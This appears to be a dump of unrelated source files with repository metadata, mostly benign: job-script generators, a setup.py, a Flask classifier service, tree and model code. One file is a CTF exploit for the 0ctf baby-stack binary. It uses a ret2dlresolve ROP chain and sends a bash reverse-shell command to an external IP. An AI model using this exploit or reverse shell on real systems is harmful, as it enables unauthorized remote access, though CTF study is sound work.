This is functionally equivalent to the mkdir -p [fname] bash command
'''
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def main():
parser = argparse.ArgumentParser(description="Run submission script.")
parser.add_argument("--data_dir", type=str, help="Where is the base output directory for each run?")
parser.add_argument("--config_dir", type=str, help="Where is the configuration directory for experiment?")
parser.add_argument("--replicates", type=int, default=default_num_replicates, help="How many replicates should we run of each condition?")
parser.add_argument("--run_experiment", action="store_true", help="Should we run the experiment?")
parser.add_argument("--run_analysis", action="store_true", help="Should we run analyze mode?")
parser.add_argument("--analysis_file", type=str, default="analysis.cfg", help="Path to the analysis script to use for avida analyze mode.")
parser.add_argument("--job_dir", type=str, help="Where to output these job files?")
# Load in command line arguments
args = parser.parse_args()
data_dir = args.data_dir
config_dir = args.config_dir
num_replicates = args.replicates
run_exp = args.run_experiment
run_analysis = args.run_analysis
analysis_file_path = args.analysis_file
job_dir = args.job_dir
# Get list of all combinations to run
combo_list = combos.get_combos()
# Calculate how many jobs we have, and what the last id will be
num_jobs = num_replicates * len(combo_list)
final_job_id = seed_offset + num_jobs
num_digits = len(str(final_job_id))
print(f'Generating {num_jobs} across {len(combo_list)} files!')
# Create job file for each condition
cur_job_id = 0
for condition_dict in combo_list:
cur_seed = seed_offset + (cur_job_id * num_replicates)
job_id_str = str(cur_seed).zfill(num_digits)
filename_prefix = f'{cur_seed}_avida__{combos.get_str(condition_dict)}'
file_str = base_sub_script
file_str = file_str.replace("<<TIME_REQUEST>>", job_time_request)
file_str = file_str.replace("<<ARRAY_ID_RANGE>>", f"1-{num_replicates}")
file_str = file_str.replace("<<MEMORY_REQUEST>>", job_memory_request)
file_str = file_str.replace("<<JOB_NAME>>", job_name)
file_str = file_str.replace("<<CONFIG_DIR>>", config_dir)
file_str = file_str.replace("<<EXEC>>", executable)
file_str = file_str.replace("<<RUN_DIR>>", \
os.path.join(data_dir, f'{filename_prefix}', '${SEED}'))
file_str = file_str.replace("<<JOB_SEED_OFFSET>>", str(cur_seed))
# Format configuration parameters for the run
run_params = f'-set EVENT_FILE {condition_dict["EVENT_FILE"]}'
run_params += ' -set COPY_MUT_PROB 0.0025'
run_params += ' -set DISABLE_REACTION_SENSORS 1'
run_params += ' -set REACTION_SENSORS_NEUTRAL 0.0'
run_params += ' -set RANDOM_SEED ${SEED}'
# Add run commands if we're running the experiment.
run_commands = ''
if run_exp:
run_commands += f'RUN_PARAMS="{run_params}"\n'
run_commands += 'echo "./${EXEC} ${RUN_PARAMS}" > cmd.log\n'
run_commands += './${EXEC} ${RUN_PARAMS} > run.log\n'
file_str = file_str.replace("<<RUN_COMMANDS>>", run_commands)
# Add analysis commands if we're analyzing the data
analysis_commands = ""
if run_analysis:
analysis_commands += f'RUN_PARAMS="{run_params}"\n'
analysis_commands += './${EXEC} ${RUN_PARAMS}'
analysis_commands += ' -set ANALYZE_FILE ' + analysis_file_path
analysis_commands += ' -a\n'
file_str = file_str.replace("<<ANALYSIS_COMMANDS>>", analysis_commands)
with open(os.path.join(job_dir, f'{filename_prefix}.sb'), 'w') as fp:
fp.write(file_str)
cur_job_id += 1
if __name__ == "__main__":
main()
| 43.067797 | 143 | 0.65978 |
acf6a078954001340f169678e1fdafcd5115f054 | 3,719 | py | Python | setup.py | federico123579/Foreanalyzer | 8d66550a894304c0f62f985c1410f56ed1561b3a | [
"MIT"
] | 2 | 2020-12-24T00:10:04.000Z | 2021-12-19T03:34:41.000Z | setup.py | federico123579/Foreanalyzer | 8d66550a894304c0f62f985c1410f56ed1561b3a | [
"MIT"
] | null | null | null | setup.py | federico123579/Foreanalyzer | 8d66550a894304c0f62f985c1410f56ed1561b3a | [
"MIT"
] | 1 | 2020-11-17T07:41:06.000Z | 2020-11-17T07:41:06.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'foreanalyzer'
DESCRIPTION = 'Algorithms analyzer for the Forecaster bot.'
URL = 'https://github.com/federico123579/Foreanalyzer'
EMAIL = 'federico123579@gmail.com'
AUTHOR = 'Federico Lolli'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = None
# What packages are required for this module to be executed?
REQUIRED = [
"forex_python",
"trading212api",
"pandas"
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier
# for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system(
'{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
| 27.548148 | 80 | 0.643184 |
acf6a2a781173d719f1eed8495fc7af4c33384e6 | 2,892 | py | Python | app.py | jqueguiner/open_nsfw | 27809806ba3cf9ee9034c12bbe2667f691ec90c4 | [
"BSD-2-Clause"
] | null | null | null | app.py | jqueguiner/open_nsfw | 27809806ba3cf9ee9034c12bbe2667f691ec90c4 | [
"BSD-2-Clause"
] | null | null | null | app.py | jqueguiner/open_nsfw | 27809806ba3cf9ee9034c12bbe2667f691ec90c4 | [
"BSD-2-Clause"
] | null | null | null | import os
import sys
import subprocess
import requests
import ssl
import random
import string
import json
from flask import jsonify
from flask import Flask
from flask import request
import traceback
import numpy as np
import uvloop
from classify_nsfw import caffe_preprocess_and_compute, load_model
from app_utils import download
from app_utils import generate_random_filename
from app_utils import clean_me
from app_utils import clean_all
from app_utils import create_directory
from app_utils import get_model_bin
from app_utils import get_multi_model_bin
try: # Python 3.5+
from http import HTTPStatus
except ImportError:
try: # Python 3
from http import client as HTTPStatus
except ImportError: # Python 2
import httplib as HTTPStatus
app = Flask(__name__)
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def classify(image_path: str) -> np.float64:
with open(image_path, "rb") as image:
scores = caffe_preprocess_and_compute(image.read(), caffe_transformer=caffe_transformer, caffe_net=nsfw_net, output_layers=["prob"])
return scores[1]
@app.route("/detect", methods=["POST"])
def detect():
input_path = generate_random_filename(upload_directory,"jpg")
try:
if 'file' in request.files:
file = request.files['file']
if allowed_file(file.filename):
file.save(input_path)
else:
url = request.json["url"]
download(url, input_path)
results = []
nudity = classify(input_path)
results.append({"nudity": str(True),"score": "{0:.4f}".format(nudity)})
results.append({"nudity": str(False), "score": "{0:.4f}".format(1-nudity)})
return json.dumps(results), 200
except:
traceback.print_exc()
return {'message': 'input error'}, 400
finally:
clean_all([
input_path
])
if __name__ == '__main__':
global upload_directory, model_directory
global nsfw_net, caffe_transformer
global ALLOWED_EXTENSIONS
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
upload_directory = '/src/upload/'
create_directory(upload_directory)
model_directory = '/src/nsfw_model/'
create_directory(model_directory)
model_url_prefix = "http://pretrained-models.auth-18b62333a540498882ff446ab602528b.storage.gra.cloud.ovh.net/image/nsfw/"
get_multi_model_bin([(
model_url_prefix + 'deploy.prototxt',
model_directory + 'deploy.prototxt'
),(
model_url_prefix + 'resnet_50_1by2_nsfw.caffemodel',
model_directory + 'resnet_50_1by2_nsfw.caffemodel'
)])
nsfw_net, caffe_transformer = load_model()
port = 5000
host = '0.0.0.0'
app.run(host=host, port=port, threaded=True)
| 24.717949 | 140 | 0.679806 |
acf6a466203c48ff663725c17faa528a688ba5ad | 1,382 | py | Python | util/get_weak_anns.py | chunbolang/BAM | edfa54beca5552aba2b5f3d19de4ef21f8d13275 | [
"MIT"
] | 41 | 2022-03-12T03:09:32.000Z | 2022-03-31T16:13:19.000Z | util/get_weak_anns.py | chunbolang/BAM | edfa54beca5552aba2b5f3d19de4ef21f8d13275 | [
"MIT"
] | 11 | 2022-03-16T14:26:14.000Z | 2022-03-31T12:40:05.000Z | util/get_weak_anns.py | chunbolang/BAM | edfa54beca5552aba2b5f3d19de4ef21f8d13275 | [
"MIT"
] | 6 | 2022-03-18T12:50:34.000Z | 2022-03-30T06:03:07.000Z | from __future__ import absolute_import, division
import networkx as nx
import numpy as np
from scipy.ndimage import binary_dilation, binary_erosion, maximum_filter
from scipy.special import comb
from skimage.filters import rank
from skimage.morphology import dilation, disk, erosion, medial_axis
from sklearn.neighbors import radius_neighbors_graph
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from scipy import ndimage
def find_bbox(mask):
_, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))
return stats[1:] # remove bg stat
def transform_anns(mask, ann_type):
mask_ori = mask.copy()
if ann_type == 'bbox':
bboxs = find_bbox(mask)
for j in bboxs:
cv2.rectangle(mask, (j[0], j[1]), (j[0] + j[2], j[1] + j[3]), 1, -1) # -1->fill; 2->draw_rec
return mask, mask_ori
elif ann_type == 'mask':
return mask, mask_ori
if __name__ == '__main__':
label_path = '2008_001227.png'
mask = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
bboxs = find_bbox(mask)
mask_color = cv2.imread(label_path, cv2.IMREAD_COLOR)
for j in bboxs:
cv2.rectangle(mask_color, (j[0], j[1]), (j[0] + j[2], j[1] + j[3]), (0,255,0), -1)
cv2.imwrite('bbox.png', mask_color)
print('done')
| 32.904762 | 113 | 0.663531 |
acf6a488c98e192673a2f81785a091e6cf59c302 | 3,644 | py | Python | src/web/models/user.py | rodekruis/shelter-database | 99f96bf06a7287e925b7385dbf7cc363caf4a2bd | [
"MIT"
] | 9 | 2016-07-12T06:41:48.000Z | 2022-02-03T05:55:17.000Z | src/web/models/user.py | rodekruis/shelter-database | 99f96bf06a7287e925b7385dbf7cc363caf4a2bd | [
"MIT"
] | 22 | 2016-09-06T05:36:37.000Z | 2021-09-07T23:41:26.000Z | src/web/models/user.py | rodekruis/shelter-database | 99f96bf06a7287e925b7385dbf7cc363caf4a2bd | [
"MIT"
] | 3 | 2016-08-19T05:37:08.000Z | 2017-02-20T06:58:03.000Z | #! /usr/bin/env python
#-*- coding: utf-8 -*-
# ***** BEGIN LICENSE BLOCK *****
# This file is part of Shelter Database.
# Copyright (c) 2016 Luxembourg Institute of Science and Technology.
# All rights reserved.
#
#
#
# ***** END LICENSE BLOCK *****
__author__ = "Cedric Bonhomme"
__version__ = "$Revision: 0.1 $"
__date__ = "$Date: 2016/03/30$"
__revision__ = "$Date: 2016/03/30 $"
__copyright__ = "Copyright (c) "
__license__ = ""
import re
import conf
import requests
from datetime import datetime
from werkzeug import generate_password_hash, check_password_hash
from flask_login import UserMixin
from sqlalchemy import desc
from sqlalchemy.dialects.postgresql import JSON
from bootstrap import db
class User(db.Model, UserMixin):
"""
Represent a user.
"""
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(), unique=True, nullable=False)
name = db.Column(db.String(), default='')
pwdhash = db.Column(db.String(), nullable=False)
h_id = db.Column(db.String(), nullable=True)
image = db.Column(JSON, nullable=True)
organization = db.Column(db.String(), nullable=True)
created_at = db.Column(db.DateTime(), default=datetime.now)
last_seen = db.Column(db.DateTime(), default=datetime.now)
is_admin = db.Column(db.Boolean(), default=False)
is_active = db.Column(db.Boolean(), default=False)
preferred_language = db.Column(db.String(), default='en')
# relationships
shelters = db.relationship('Shelter', backref='responsible', lazy='dynamic',
cascade='all, delete-orphan',
order_by=desc('Shelter.id'))
@staticmethod
def make_valid_name(name):
return re.sub('[^a-zA-Z0-9_\.]', '', name)
def get_id(self):
"""
Return the id of the user.
"""
return self.id
def set_password(self, password):
"""
Hash the password of the user.
"""
self.pwdhash = generate_password_hash(password)
def check_password(self, password):
"""
Check the password of the user.
"""
return check_password_hash(self.pwdhash, password)
def get_image_url(self):
"""
Get Image from json data saved in user column `image`
where the image format is of :
[{
"type": "URL",
"url": "https://media.licdn.com/mpr/mpr/shrin.jpg",
"_id": "58ac0b0a3a474c7b005b0542"
},....]
This is stored using libs/utils.py Class: HumanitarianId
"""
# For old api data
if self.image and isinstance(self.image, list):
for image in self.image:
# Return url of type url among images
if image.get('type', None) == 'URL':
return image.get('url')
# For new api data (just single url)
if self.image and len(self.image):
return self.image
# if h_id is only present, then image url can be
if self.h_id:
image = conf.HUMANITARIAN_ID_AUTH_URI+"/assets/pictures/"\
+ self.h_id + ".jpg"
r = requests.get(image)
if r.status_code == 200:
self.image = image
db.session.add(self)
db.session.commit()
return image
return None
# def __eq__(self, other):
# return self.id == other.id
def __str__(self):
"""
Required for administrative interface.
"""
return self.name
def __repr__(self):
return '<User %r>' % (self.name)
| 30.621849 | 80 | 0.590834 |
acf6a5325b24cc793124eff67d98b3af1219e111 | 1,287 | py | Python | 2018/0ctf/baby-stack/hack.py | ss8651twtw/CTF | cf348597cb72558cc5cd8d50582860fadf014228 | [
"MIT"
] | 12 | 2018-01-06T13:36:57.000Z | 2021-07-19T16:47:57.000Z | 2018/0ctf/baby-stack/hack.py | ss8651twtw/Secure-Programming | cf348597cb72558cc5cd8d50582860fadf014228 | [
"MIT"
] | null | null | null | 2018/0ctf/baby-stack/hack.py | ss8651twtw/Secure-Programming | cf348597cb72558cc5cd8d50582860fadf014228 | [
"MIT"
] | 2 | 2019-07-06T03:46:38.000Z | 2019-10-28T15:15:36.000Z | #!/usr/bin/env python
from pwn import *
from hashlib import sha256
import time
# r = process('./babystack')
r = remote('202.120.7.202', 6666)
def verify():
data = r.recvline()[:-1]
for i in xrange(2 ** 32):
if sha256(data + p32(i)).digest().startswith('\0\0\0'):
break
r.send(p32(i))
log.info('POW is over')
sleep(0.5)
def send(data, length):
time.sleep(0.1)
r.send(data.ljust(length))
plt0 = 0x80482f0
relplt = 0x80482b0
dynsym = 0x80481cc
dynstr = 0x804822c
main = 0x8048457
read_plt = 0x8048300
buf = 0x804a500
rop = flat(
# _dl_runtime_resolve call and reloc_arg
plt0, buf - relplt, # will resolve system
0xdeadbeef, # return address
buf + 36 # parameter "/bin/sh"
)
data = flat(
# Elf32_Rel
buf, 0x7 | ((buf + 12 - dynsym) / 16) << 8, 0xdeadbeef, # 0xdeadbeef is padding
# Elf32_Sym
buf + 28 - dynstr, 0, 0, 0x12,
'system\x00\x00',
'/bin/sh\x00'
)
verify()
# read data to buf
send('a' * 44 + flat(read_plt, main, 0, buf, 44), 0x40)
send(data, 44)
# use ret2dlresolve to call system("/bin/sh")
send('a' * 44 + rop, 0x40)
# make a reverse shell
send('bash -c "bash -i &>/dev/tcp/35.201.141.84/80 0>&1"', 0x100)
r.interactive() | 21.098361 | 87 | 0.590521 |
acf6a68de512eb216ac25ce589db67bd09ee7997 | 3,010 | py | Python | tutorons/core/templates/module/detect.py | andrewhead/tutorons-base | d997ebec27d2723bf5cd34981eb7900c19ce8914 | [
"BSD-3-Clause"
] | 2 | 2019-10-21T05:42:09.000Z | 2020-12-01T20:56:00.000Z | tutorons/core/templates/module/detect.py | andrewhead/tutorons-base | d997ebec27d2723bf5cd34981eb7900c19ce8914 | [
"BSD-3-Clause"
] | null | null | null | tutorons/core/templates/module/detect.py | andrewhead/tutorons-base | d997ebec27d2723bf5cd34981eb7900c19ce8914 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from tutorons.core.extractor import Region
logging.basicConfig(level=logging.INFO, format="%(message)s")
class {{ title_case_app_name }}Extractor(object):
''' Finds regions of explainable code in HTML elements. '''
def extract(self, node):
'''
Detect explainable regions of code in an HTML element.
Args:
node: an HTML element (it's a node created by BeautifulSoup
parsing HTML)
Returns:
A list of `Region`s, each containing a piece of detected code and
a link to its unique location in the page.
'''
# Get the text contained in the HTML element
text = node.text
# Detect code in the element. However you detect it, you need to make
# sure to save the character offset of the piece of code within the
# text of this HTML element. Most code parsers will give you a line
# and offset of each symbol. If you use such a parser, you can find
# the character offset of the code by sum up the number of characters
# in each line before the one where code was detected, and
# then add the within-line offset. In this example, we just use the
# standard Python string API to look for everywhere the symbol `foo`
# appears in the element.
pattern = "foo"
last_match_end = 0
# We'll store all of the detected code in this list.
regions = []
while True:
# Although the pattern detection shown here is specific to this
# example, this code computes offsets and makes regions in a way
# you'll have to do in your own code.
# You need to detect the index of the character where the code
# was detected.
match_start = text.find(pattern, last_match_end)
if match_start == -1:
break
# You also need to detect the index where the code stops. Make
# sure this points to the last character in the code and not
# to the first character after the code.
match_end = match_start + len(pattern) - 1
# Every region needs to include a reference to the node it was
# extracted from, the index of the first character where the code
# was detected within that element, the index of the last character
# of the detected code, and the code itself.
matching_region = Region(
node=node,
start_offset=match_start,
end_offset=match_end,
string=pattern,
)
regions.append(matching_region)
# Save the end index of this match so it can be used to advance
# the text search in the next loop iteration.
last_match_end = match_end
return regions
| 37.160494 | 79 | 0.611296 |
acf6a6de63ff3921ee5fba6c848d43e2ea92f353 | 3,691 | py | Python | src/test/vtkLocationCompare.py | jeremyjiezhou/Learn-PyTorch | 7e4404609bacd2ec796f6ca3ea118e8e34ab4a22 | [
"MIT"
] | 24 | 2016-10-04T20:49:55.000Z | 2022-03-12T19:07:10.000Z | src/test/vtkLocationCompare.py | jeremyjiezhou/Learn-PyTorch | 7e4404609bacd2ec796f6ca3ea118e8e34ab4a22 | [
"MIT"
] | null | null | null | src/test/vtkLocationCompare.py | jeremyjiezhou/Learn-PyTorch | 7e4404609bacd2ec796f6ca3ea118e8e34ab4a22 | [
"MIT"
] | 9 | 2016-12-11T22:15:03.000Z | 2020-11-21T13:51:05.000Z | #! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 18 16:56:58 2014
@author: Mayank Sabharwal, 2015
"""
PARAVIEW_PATH='@PARAVIEW_DIR@/Build'
paraview_path=PARAVIEW_PATH
import os,sys
import scipy as sp
import numpy as np
if os.path.exists(paraview_path):
for x in os.walk(paraview_path):
sys.path.append(x[0])
os.environ["LD_LIBRARY_PATH"]=os.environ.get("LD_LIBRARY_PATH")+":"+x[0]
try:
import paraview.simple as s
flag=1
except:
flag=0
print "Failed to import Paraview Python Libraries"
print "Exiting code"
exit(3)
else:
print "Paraview source build not found!"
print "Set the Paraview Path in openfcst/src/CMakeLists.txt!"
flag=0
exit(3)
print "="*50
print "="*50
print "= Checking the accuracy of the test results against the expected results"
print "-"*50
print "-"*50
print "= - Parse Commandline "
# Import command line option parser:
from optparse import OptionParser
# Setup of the command line options:
usage = "usage: %prog [options] fuel_cell_solution_DataFile_00001_Cycle_4.vtk reference_data.dat"
parser = OptionParser(usage)
options, filename = parser.parse_args(sys.argv[1:])
print "-"*50
print "-"*50
print "= - Load data"
print "Checking test results from file:", filename[1]
print "by comparing with data in the simulation result file:", filename[0]
tmp=sp.loadtxt(filename[1],dtype='string')
header = tmp[0]
refData = np.array(tmp[1:],dtype='float')
x=np.array(refData[:,0])
y=np.array(refData[:,1])
z=np.array(refData[:,2])
refResponses={}
for i in range(np.size(header)-3):
refResponses[header[i+3]] = refData[:,i+3]
simResponses={}
for name in refResponses.iterkeys():
simResponses[name]=[]
fname=os.getcwd()+'/'+filename[0]
extension = os.path.splitext(filename[0])[1]
if extension == '.vtk':
solution = s.LegacyVTKReader( guiName="solution", FileNames=[fname] )
elif extension == '.vtu':
solution = s.XMLUnstructuredGridReader( guiName="solution", FileName=[fname] )
else:
print "= - Unknown file format of type: ", extension
for i in range(np.size(x)):
temp=[]
ProbeLocation1=[]
ProbeLocation1 = s.ProbeLocation( guiName="ProbeLocation1", ProbeType="Fixed Radius Point Source", Input = solution )
ProbeLocation1.ProbeType.Center = [x[i],y[i],z[i]]
temp=s.servermanager.Fetch(ProbeLocation1)
for name in refResponses.iterkeys():
if name == 'velocity_X':
simResponses[name].append(temp.GetPointData().GetArray('velocity').GetValue(0))
elif name == 'velocity_Y':
simResponses[name].append(temp.GetPointData().GetArray('velocity').GetValue(1))
elif name == 'velocity_Z':
simResponses[name].append(temp.GetPointData().GetArray('velocity').GetValue(2))
else:
simResponses[name].append(temp.GetPointData().GetArray(name).GetValue(0))
error={}
for name in simResponses.iterkeys():
error[name]=np.absolute(refResponses[name]-simResponses[name])/refResponses[name]
max_error=np.max(error.values())
if max_error == 0:
print "Test results match expected results"
print "="*50
print "="*50
exit(0)
elif max_error < 0.01:
print "Test results are within numerical error (1%), with the greatest being: ", max_error*100
print "="*50
print "="*50
exit(0)
elif max_error < 0.1:
print "Test results have an unacceptable error (between 1% and 10%), with the largest being: ", max_error*100
print "="*50
print "="*50
exit(1)
else:
print "Test results differ significantly from the expected results (greater than 10%): ", max_error*100
print "="*50
print "="*50
exit(1) | 30.254098 | 121 | 0.678407 |
acf6a87982d66f123cf59058b2e5a5f237ae7d5c | 2,399 | py | Python | assignment2/AssignmentMaterial_2/Framework/VideoCaptureDevices/ClassProperty.py | ecly/assignment1_bsii | eeb2bd6bfa3071df53457ce2a2ab723c6fedffe3 | [
"MIT"
] | null | null | null | assignment2/AssignmentMaterial_2/Framework/VideoCaptureDevices/ClassProperty.py | ecly/assignment1_bsii | eeb2bd6bfa3071df53457ce2a2ab723c6fedffe3 | [
"MIT"
] | null | null | null | assignment2/AssignmentMaterial_2/Framework/VideoCaptureDevices/ClassProperty.py | ecly/assignment1_bsii | eeb2bd6bfa3071df53457ce2a2ab723c6fedffe3 | [
"MIT"
] | null | null | null | #<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- SIGB - Introduction to Graphics and Image Analysis -->
#<!-- File : ClassProperty.py -->
#<!-- Description: Class for managing the direct access to non-instanced -->
#<!-- objects in SIGB framework -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsable: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: This class is based on an example available in Stack -->
#<!-- Overflow Website (http://goo.gl/5YUJAQ) -->
#<!-- Date : 03/06/2014 -->
#<!-- Change : 03/06/2014 - Creation of this class -->
#<!-- Review : 24/10/2015 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = "$Revision: 2015102401 $"
########################################################################
class ClassProperty(object):
#----------------------------------------------------------------------#
# ClassProperty Class Constructor #
#----------------------------------------------------------------------#
"""Class for managing the direct access to non-instanced objects."""
def __init__(self, getter, instance="0"):
"""ClassProperty Class Constructor."""
self.getter = getter
self.instance = instance
#----------------------------------------------------------------------#
# Class Methods #
#----------------------------------------------------------------------#
def __get__(self, instance, owner):
"""Get the current object instance."""
return self.getter(owner)
| 59.975 | 79 | 0.34306 |
acf6a8e9ca9b181b601c08e91da7568bc00f9363 | 1,299 | py | Python | src/unicef_security/pipeline.py | unicef/unicef-security | cc51ba52cddb845b8174cf3dc94706f0334453b2 | [
"Apache-2.0"
] | null | null | null | src/unicef_security/pipeline.py | unicef/unicef-security | cc51ba52cddb845b8174cf3dc94706f0334453b2 | [
"Apache-2.0"
] | 10 | 2019-04-24T14:33:49.000Z | 2020-12-19T01:07:06.000Z | src/unicef_security/pipeline.py | unicef/unicef-security | cc51ba52cddb845b8174cf3dc94706f0334453b2 | [
"Apache-2.0"
] | 1 | 2019-04-11T15:34:18.000Z | 2019-04-11T15:34:18.000Z | from social_core.pipeline import social_auth
from social_core.pipeline.user import USER_FIELDS
from .config import UNICEF_EMAIL
def social_details(backend, details, response, *args, **kwargs):
r = social_auth.social_details(backend, details, response, *args, **kwargs)
r['details']['idp'] = response.get('idp')
if not r['details'].get('email'):
if not response.get('email'):
r['details']['email'] = response["signInNames.emailAddress"]
else:
r['details']['email'] = response.get('email')
email = r['details'].get('email')
if isinstance(email, str):
r['details']['email'] = email.lower()
return r
def get_username(strategy, details, backend, user=None, *args, **kwargs):
return {'username': details.get('email')}
def create_unicef_user(strategy, details, backend, user=None, *args, **kwargs):
"""Overrides create_user, to create only UNICEF users"""
if user:
return {'is_new': False}
fields = dict((name, kwargs.get(name, details.get(name)))
for name in backend.setting('USER_FIELDS', USER_FIELDS))
if not (fields and details.get('email', '').endswith(UNICEF_EMAIL)):
return
return {
'is_new': True,
'user': strategy.create_user(**fields)
}
| 33.307692 | 79 | 0.639723 |
acf6a9fe3cc450334faa6ef4eb8ad10d675cc988 | 2,712 | py | Python | Lab2_ALG/src/BinarySearchTree.py | DanialAroff/WIA2005---Lab | d8eb035cab07c0d7962ca3ca0e70407c116c0caf | [
"Apache-2.0"
] | null | null | null | Lab2_ALG/src/BinarySearchTree.py | DanialAroff/WIA2005---Lab | d8eb035cab07c0d7962ca3ca0e70407c116c0caf | [
"Apache-2.0"
] | null | null | null | Lab2_ALG/src/BinarySearchTree.py | DanialAroff/WIA2005---Lab | d8eb035cab07c0d7962ca3ca0e70407c116c0caf | [
"Apache-2.0"
] | 1 | 2020-04-14T10:48:00.000Z | 2020-04-14T10:48:00.000Z | class TreeNode:
def __init__(self, data=None):
self.data = data
self.right = None
self.left = None
class BST:
def __init__(self):
self.root = None
def get_root(self):
return self.root
def insert(self, data):
parent = None
if self.root is None:
self.root = TreeNode(data)
else:
current = self.root
while current is not None:
if data < current.data:
parent = current
current = current.left
elif data > current.data:
parent = current
current = current.right
if data < parent.data:
parent.left = TreeNode(data)
elif data > parent.data:
parent.right = TreeNode(data)
def search(self, data):
current = self.root
while current is not None:
if data < current.data:
current = current.left
elif data > current.data:
current = current.right
else:
return True
return False
def min_value_node(self):
"""To find the node with minimum value within a tree"""
current = self.root
while current.left is not None:
current = current.left
return current.data
def delete(self, data):
parent = current = self.root
while current is not None:
if data < current.data:
parent = current
current = current.left
elif data > current.data:
parent = current
current = current.right
else:
# if node does not have a left child
if current.left is None:
parent.left = current.right
break
# if node has left child
elif current.left is not None:
temp = current.left
while temp.right is not None:
parent_temp = temp
temp = temp.right
current.data = temp.data
# connect the parent of rightmost node to
# the left child of rightmost node
parent_temp.right = temp.left
def inorder(self):
"""a function which mainly calls the inorderRec function"""
self.inorderRec(self.root)
def inorderRec(self, root):
"""print the content with in-order traversal"""
if root:
self.inorderRec(root.left)
print(root.data)
self.inorderRec(root.right)
| 30.818182 | 67 | 0.498894 |
acf6aacf646cf025944985b8e1371d95b794592d | 841 | py | Python | tests/test_wabs_worker.py | paalkr/wal-e | ff6102a1d19cf0f683c7232f618dbe8d14e6e017 | [
"BSD-3-Clause"
] | 2,739 | 2015-01-05T03:57:02.000Z | 2022-03-22T10:51:38.000Z | tests/test_wabs_worker.py | 0xgpapad/wal-e | f5b3e790fe10daa098b8cbf01d836c4885dc13c7 | [
"BSD-3-Clause"
] | 264 | 2015-01-13T01:07:19.000Z | 2022-02-08T00:56:14.000Z | tests/test_wabs_worker.py | 0xgpapad/wal-e | f5b3e790fe10daa098b8cbf01d836c4885dc13c7 | [
"BSD-3-Clause"
] | 245 | 2015-01-11T15:13:42.000Z | 2022-02-10T10:58:09.000Z | import pytest
from wal_e.worker.wabs import BackupList
from wal_e import storage
from wabs_integration_help import (
FreshContainer,
no_real_wabs_credentials,
)
# Contrivance to quiet down pyflakes, since pytest does some
# string-evaluation magic in test collection.
no_real_wabs_credentials = no_real_wabs_credentials
@pytest.mark.skipif("no_real_wabs_credentials()")
def test_empty_latest_listing():
"""Test listing a 'backup-list LATEST' on an empty prefix."""
container_name = 'wal-e-test-empty-listing'
layout = storage.StorageLayout('wabs://{0}/test-prefix'
.format(container_name))
with FreshContainer(container_name) as fb:
fb.create()
bl = BackupList(fb.conn, layout, False)
found = list(bl.find_all('LATEST'))
assert len(found) == 0
| 30.035714 | 65 | 0.702735 |
acf6ac2c24149a35c409a7e0c2c0e141ea8861a3 | 800 | py | Python | ckan/lib/jsonp.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
